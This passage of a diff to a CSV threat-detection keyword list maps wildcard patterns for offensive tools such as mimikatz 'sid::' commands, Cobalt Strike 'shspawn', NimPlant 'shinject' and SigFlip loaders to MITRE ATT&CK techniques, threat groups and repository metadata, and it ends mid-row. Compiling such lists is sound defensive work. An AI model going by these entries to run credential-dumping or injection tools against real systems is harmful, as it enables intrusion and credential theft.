TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*shinject *","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*shinject.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*shinject_ex *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shocknawe.py*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*Shodan.io*","offensive_tool_keyword","shodan.io","Shodan is the worlds first search engine for Internet-connected devices.","T1016 - T1597 - T1526 - T1046 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://www.shodan.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*shodanp.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*ShorSec/DavRelayUp*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","446","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*shodanp.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*ShorSec/DavRelayUp*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*ShorSec/DllNotificationInjection*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" "*ShorSec/ShadowSpray*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" -"*Show-TargetScreen.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Show-TargetScreen.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*shspawn x64 *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shspawn x86 *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shucknt.php*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" "*ShuckNT-main*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" "*ShutdownRepo/pywhisker*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" "*ShutdownRepo/smartbrute*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*sid::add*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sid::clear*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sid::lookup*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sid::modify*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sid::patch*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sid::query*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sigflip*/Bof/*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*SigFlip.exe -*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*SigFlip.WinTrustData*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*SigInject *","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*SigInject *.dll*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*SigLoader *","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*Sigloader *.dll*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*SigLoader.*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*SigLoader/sigloader.c*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*signal2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*sid::add*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sid::clear*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sid::lookup*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sid::modify*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sid::patch*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract 